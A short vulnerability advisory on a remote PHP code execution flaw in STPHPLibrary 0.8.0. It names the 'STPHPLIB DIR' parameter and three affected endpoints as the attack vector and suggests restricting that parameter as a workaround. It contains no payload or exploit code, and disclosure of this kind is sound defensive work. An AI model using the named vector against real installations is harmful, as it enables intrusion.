Leetsecurity

Name of the Vulnerable Software and Affected Versions: STPHPLibrary version 0.8.0 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the `STPHPLIB DIR` parameter to API endpoints such as "stphpapplication.php", "stphpbtnimage.php", or "stphpform.php". Recommendations: For STPHPLibrary version 0.8.0, consider restricting access to the `STPHPLIB DIR` parameter in the affected API endpoints until a patch is available. As a temporary workaround, avoid using the `STPHPLIB DIR` parameter in the "stphpapplication.php", "stphpbtnimage.php", and "stphpform.php" endpoints to minimize the risk of exploitation.